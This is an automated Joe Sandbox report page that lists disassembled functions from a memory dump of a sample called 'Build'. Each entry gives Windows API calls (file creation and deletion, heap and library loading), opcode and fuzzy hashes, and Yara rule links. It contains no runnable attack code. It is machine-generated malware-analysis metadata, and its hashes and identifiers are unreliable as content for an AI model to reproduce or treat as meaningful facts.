Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: 97e676c9407397726a9ece374dcb99f81523696d9f1f295b2417a088ea690268
Instruction ID: 2cfcf0b82bdca86998d7d44640ee20bc88174a19d47b3b048b92b3a3a3066843
Opcode Fuzzy Hash: 97e676c9407397726a9ece374dcb99f81523696d9f1f295b2417a088ea690268
Instruction Fuzzy Hash: BDF09031A4521CBBCB016F65DD05DAD7BA1DB58711B0081A5FD191A160CE354E109B81

Function 00B6D3FF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 00B6D43E

Strings

FlsAlloc, xrefs: 00B6D410, 00B6D41A

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 845474b68e54afcdad1318563811d09f17739f42fd8b80d0a5840c73412e4845
Instruction ID: b934b1f0828c791c148321804db3acc7911930ae35356b5977b05ab6984a9644
Opcode Fuzzy Hash: 845474b68e54afcdad1318563811d09f17739f42fd8b80d0a5840c73412e4845
Instruction Fuzzy Hash: FEE02B31F41218ABC7046FA59C16D6DBBE5CB88710F4141E9FC1D673A1CD755D40A6C6

Function 00B610A8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00B610BA

Part of subcall function 00B60D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B60DAD
Part of subcall function 00B60D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B60DBE

Strings

3To, xrefs: 00B610A8, 00B610B4

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 3To
API String ID: 1269201914-245939750
Opcode ID: 972ccd526eb93fb0bee9a57842149dbad72d2538bd4c959025ec6f15f805d3d1
Instruction ID: 899a51d793fcf60847aac14cc388e14ec220a367648b9090ef3fa340753c515e
Opcode Fuzzy Hash: 972ccd526eb93fb0bee9a57842149dbad72d2538bd4c959025ec6f15f805d3d1
Instruction Fuzzy Hash: 38B092A23AC102AC2A282159AC028370188C081B20330CAEAF814C008098492C840032

Function 00B6E240 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 00B6DE0B: GetOEMCP.KERNEL32(00000000,?,?,00B6E094,?), ref: 00B6DE36

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00B6E0D9,?,00000000), ref: 00B6E2B4
GetCPInfo.KERNEL32(00000000,00B6E0D9,?,?,?,00B6E0D9,?,00000000), ref: 00B6E2C7

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 8b3f25a04298d831b779f398631b60cd2d3c382eefe84b994af51a9540bac766
Instruction ID: 1e687980c76d7a19dff8e19b5edd31212c045f7ca56b845ee3aabc7478bdeacb
Opcode Fuzzy Hash: 8b3f25a04298d831b779f398631b60cd2d3c382eefe84b994af51a9540bac766
Instruction Fuzzy Hash: 56512578E002059EDB268F75C8856BEBBE5EF41300F1444EEE0A68B351D73DE946CB94

Function 00B4B45F Relevance: 3.1, APIs: 2, Instructions: 140COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,?,00000800,?,?,00000000,?,?,00B4B43B,00000800,00000800,00000000,?,?,00B4A31D,?), ref: 00B4B5EB
GetLastError.KERNEL32(?,?,00B4A31D,?,?,?,?,?,?,?,?), ref: 00B4B5FA

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 955a9d9a9e0c4b2e3194860f24a102e04838bbebbbf4896f4239914ed2b36366
Instruction ID: e913201b9b27562428dec62f3b4e3fb43f501e0018a2d8c0317b0468a6ca9bf2
Opcode Fuzzy Hash: 955a9d9a9e0c4b2e3194860f24a102e04838bbebbbf4896f4239914ed2b36366
Instruction Fuzzy Hash: DF41F531604345CBDB249F65C4D4DBAB3E5FF68320F1049A9EA4683342DBB4DE80AB91

Function 00B6E077 Relevance: 3.1, APIs: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 00B6B9A5: GetLastError.KERNEL32(?,00B850C4,00B66E12,00B850C4,?,?,00B6688D,?,?,00B850C4), ref: 00B6B9A9
Part of subcall function 00B6B9A5: _free.LIBCMT ref: 00B6B9DC
Part of subcall function 00B6B9A5: SetLastError.KERNEL32(00000000,?,00B850C4), ref: 00B6BA1D
Part of subcall function 00B6B9A5: _abort.LIBCMT ref: 00B6BA23

Part of subcall function 00B6E19E: _abort.LIBCMT ref: 00B6E1D0
Part of subcall function 00B6E19E: _free.LIBCMT ref: 00B6E204

Part of subcall function 00B6DE0B: GetOEMCP.KERNEL32(00000000,?,?,00B6E094,?), ref: 00B6DE36

_free.LIBCMT ref: 00B6E0EF
_free.LIBCMT ref: 00B6E125

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: 992fe1fa0cde9adc39a7e12867f101aa3fab5c5dda55f670bd2a3885b63420f3
Instruction ID: f2615f2e6bade9964037c6dc5fc0017aa7df6f8d18a14f3076697fce2c40ce20
Opcode Fuzzy Hash: 992fe1fa0cde9adc39a7e12867f101aa3fab5c5dda55f670bd2a3885b63420f3
Instruction Fuzzy Hash: 3E31A235904208AFDB10EFA9D442BAD77F5EF41320F2540E9E5249B2A1EFBA9D81DB50

Function 00B4B01E Relevance: 3.1, APIs: 2, Instructions: 89fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,00000000,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00B4B967,?,?,00B487FD), ref: 00B4B0A4
CreateFileW.KERNEL32(?,?,00000000,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00B4B967,?,?,00B487FD), ref: 00B4B0D4

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 215dbc1bed9d0d28c7409f92faf57bb7c9a61eb7f84d1cab4aedd78d58cad25b
Instruction ID: c484e13f11b8ecc91aafa1be1e1cc097bedb521ba4e6a2b04e92a6e0bafa8acc
Opcode Fuzzy Hash: 215dbc1bed9d0d28c7409f92faf57bb7c9a61eb7f84d1cab4aedd78d58cad25b
Instruction Fuzzy Hash: 19216F71504344AFE3309F29CC85FB7B7DCEB58321F004A59FAA5C62D1D774AA489661

Function 00B4B7E2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?), ref: 00B4B7FC
SetFileTime.KERNELBASE(?,?,?,?), ref: 00B4B8B0

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: c14ebc7a653d50fdf3f7df87728178745d07494b6145997d628ec02495931e62
Instruction ID: b9c4590d7ec437d693379227fd182b8ce0e723acee86417d53ca9cc8c467d569
Opcode Fuzzy Hash: c14ebc7a653d50fdf3f7df87728178745d07494b6145997d628ec02495931e62
Instruction Fuzzy Hash: 8121E431248241DBC715DF24C891EBBBBE8EF95304F08499CF9C587141D729DA0CE762

Function 00B41FB0 Relevance: 3.1, APIs: 2, Instructions: 69COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00B41FB7
_wcslen.LIBCMT ref: 00B42052

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: H_prolog3_wcslen
String ID:
API String ID: 3746244732-0
Opcode ID: 2f043b085af85ddf8dfa11bee142a21b7a8b3bf6e493b6b18dd7e6431579ce4c
Instruction ID: 87a813b05c79d4885fa6fe99c35d42b048679bad902278c1e09bbfd498ffc3d8
Opcode Fuzzy Hash: 2f043b085af85ddf8dfa11bee142a21b7a8b3bf6e493b6b18dd7e6431579ce4c
Instruction Fuzzy Hash: 552128329002199FCF15AF98C895AEDB7F2BF08300F1048A9F445A73A1CB395A55EB64

Function 00B66192 Relevance: 3.1, APIs: 2, Instructions: 67libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,00000001,00BA60C8,?,?,?,00B66386,00000004,InitializeCriticalSectionEx,00B79624,InitializeCriticalSectionEx,00000000,?,00B6613D,00BA60C8,00000FA0), ref: 00B66215
GetProcAddress.KERNEL32(00000000,?), ref: 00B6621F

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID:
API String ID: 3013587201-0
Opcode ID: b57cbc74a44f3aa827e1ade95591e308f4a10b7df5fc005e4a73663634fe07e0
Instruction ID: 4d41212ca3211591bc77d0221d893b5bfd2e1368c832b65d21f9e352d5027766
Opcode Fuzzy Hash: b57cbc74a44f3aa827e1ade95591e308f4a10b7df5fc005e4a73663634fe07e0
Instruction Fuzzy Hash: FB11B271A012159F8F23CFA4DC9099A77F5FF4676072411A9EA1AE7210EB34ED11CBD0

Function 00B4B8C0 Relevance: 3.1, APIs: 2, Instructions: 56COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00B4B907
GetLastError.KERNEL32 ref: 00B4B914

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 5f6e7a482be1019c5a1d3976ee19b2c72e5961a9f868f51c56e9b4d4b87fa666
Instruction ID: 417e36ddd2323694cacfc55096d027875d3bf2b21b858dcd7cf90244c41debdc
Opcode Fuzzy Hash: 5f6e7a482be1019c5a1d3976ee19b2c72e5961a9f868f51c56e9b4d4b87fa666
Instruction Fuzzy Hash: F011A131A00B11ABE7389728C885FA6B3E8EB45370F604AA9E352D75D0D770EE45E750

Function 00B6BB34 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00B6BB55

Part of subcall function 00B6BC8E: RtlAllocateHeap.NTDLL(00000000,?,?,?,00B66A24,?,0000015D,?,?,?,?,00B67F00,000000FF,00000000,?,?), ref: 00B6BCC0

HeapReAlloc.KERNEL32(00000000,?,?,?,?,00B850C4,00B4190A,?,?,00000007,?,?,?,00B41476,?,00000000), ref: 00B6BB91

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: 47a9c178b4187aa1bd608716fb62d01a41751ae5dce32006948f94e3314d9b84
Instruction ID: dc95769c75edb740499e7ab0cfd0ee1b6614b770a12891fe96c943493b2b66e3
Opcode Fuzzy Hash: 47a9c178b4187aa1bd608716fb62d01a41751ae5dce32006948f94e3314d9b84
Instruction Fuzzy Hash: 45F09C32500215A6DB212E65AC41F6B3BF8DF81B70B1D41FAF815D71A5DF2CDCC145A5

Function 00B4C2E5 Relevance: 3.0, APIs: 2, Instructions: 38COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,00000000,?,00000001,?,00B4BF5E,?,?), ref: 00B4C305

Part of subcall function 00B4DA1E: _wcslen.LIBCMT ref: 00B4DA59

SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00B4BF5E,?,?), ref: 00B4C334

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: 2a804b66554c60e3b6d35c59facf8e0ddb3c4fe44200df771903603a2bba2da1
Instruction ID: 463931d7bc9cbee2ce638b7d99b93f337bf31191b6b9ceab6cb4356c23f31f33
Opcode Fuzzy Hash: 2a804b66554c60e3b6d35c59facf8e0ddb3c4fe44200df771903603a2bba2da1
Instruction Fuzzy Hash: D2F06731601219ABDB00AF658C41AEEB7ECEF08704F40849ABA05E7261DE35DE849BA4

Function 00B4BC65 Relevance: 3.0, APIs: 2, Instructions: 36fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,?,?,?,00B4B14B,?,00000000,00B4AF6E,CEEE5757,00000000,00B7517A,000000FF,?,00B48882,?,?), ref: 00B4BC82

Part of subcall function 00B4DA1E: _wcslen.LIBCMT ref: 00B4DA59

DeleteFileW.KERNEL32(?,?,?,00000800,?,00B4B14B,?,00000000,00B4AF6E,CEEE5757,00000000,00B7517A,000000FF,?,00B48882,?), ref: 00B4BCAE

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: DeleteFile$_wcslen
String ID:
API String ID: 2643169976-0
Opcode ID: 91d4de17e9e198c7a5c6ea6489a5cb031632c5ad32141e620992fce01df2c5b6
Instruction ID: e7be821fa88a32dc3f4491de30949999c7a29363ca1d12775816d5705daada28
Opcode Fuzzy Hash: 91d4de17e9e198c7a5c6ea6489a5cb031632c5ad32141e620992fce01df2c5b6
Instruction Fuzzy Hash: 3AF03A35601229AADB019F649D81EEE73ECEF09701B4444A6BA05D3141DF75DE889BA4

Function 00B6030B Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00B60341

Part of subcall function 00B44C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00B44C13

SetDlgItemTextW.USER32(00000065,?), ref: 00B60358

Part of subcall function 00B5D864: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00B5D875
Part of subcall function 00B5D864: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B5D886
Part of subcall function 00B5D864: IsDialogMessageW.USER32(0002043C,?), ref: 00B5D89A
Part of subcall function 00B5D864: TranslateMessage.USER32(?), ref: 00B5D8A8
Part of subcall function 00B5D864: DispatchMessageW.USER32(?), ref: 00B5D8B2

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
String ID:
API String ID: 2718869927-0
Opcode ID: 96ee81132a7898718bfca770c432736dadd9eec821bfb54ba953ae942b68a895
Instruction ID: b5addc480ce7d6da42a7e23486803fae9209a39fc29edebd922e8cc2815695a7
Opcode Fuzzy Hash: 96ee81132a7898718bfca770c432736dadd9eec821bfb54ba953ae942b68a895
Instruction Fuzzy Hash: C4F0907191020CAADB01EF69ED06EEE7BEC9B09305F0804D2B605A3262DE349A45CB61

Function 00B4BCDD Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,?,00B4BCD4,?,00B48607,?), ref: 00B4BCFA

Part of subcall function 00B4DA1E: _wcslen.LIBCMT ref: 00B4DA59

GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,?,?,00B4BCD4,?,00B48607,?), ref: 00B4BD24

Memory Dump Source

Source File: 0000000D.00000002.1789902153.0000000000B41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00B40000, based on PE: true

Associated: 0000000D.00000002.1789847048.0000000000B40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B82000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000B89000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA2000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790087674.0000000000BA6000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000D.00000002.1790338324.0000000000BA7000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b40000_Build.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: 3c27b3f23f36a3546c04875348ab3c0daecdeb261cd3fe073a87816f882a5f7b
Instruction ID: 9a8409a71faaf21e74cac1e99b49612aabf098eb863b57a5a27684c0f810c3d2
Opcode Fuzzy Hash: 3c27b3f23f36a3546c04875348ab3c0daecdeb261cd3fe073a87816f882a5f7b
Instruction Fuzzy Hash: 99F09A35A00218ABCB00EF6899419EEB3E8EB4D760F0405A5EB06E3280DA749E819A91

